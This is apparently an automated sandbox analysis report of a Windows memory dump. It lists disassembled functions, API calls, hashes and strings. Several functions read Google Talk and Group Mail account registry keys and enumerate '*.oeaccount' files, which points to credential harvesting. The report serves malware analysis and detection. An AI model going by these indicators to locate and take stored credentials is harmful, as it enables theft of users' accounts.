                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                  • API String ID: 3071782539-966475738
                                                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                  Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->382 383 40cd59-40cd60 DeleteObject 381->383 383->382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                  • String ID:
                                                  • API String ID: 2054149589-0
                                                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                  Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408620
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • memset.MSVCRT ref: 00408671
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                  • String ID: Software\Google\Google Talk\Accounts
                                                  • API String ID: 1366857005-1079885057
                                                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                  Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 882979914-1578091866
                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                  Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                  • memset.MSVCRT ref: 00410E10
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • _mbscpy.MSVCRT ref: 00410E87
                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 889583718-2036018995
                                                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                  Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                  Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004109F7
                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                  • memset.MSVCRT ref: 00410A32
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                  Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                  Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                  Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                  • String ID: Arial
                                                  • API String ID: 3853255127-493054409
                                                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                  Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                  Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$_strcmpimemset
                                                  • String ID: /stext
                                                  • API String ID: 520177685-3817206916
                                                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                  Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                  Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                  Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                  Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                  Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                  Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                  Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                  Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                  Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                  Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                  Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                  Non-executed Functions

                                                  Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscmpstrlen
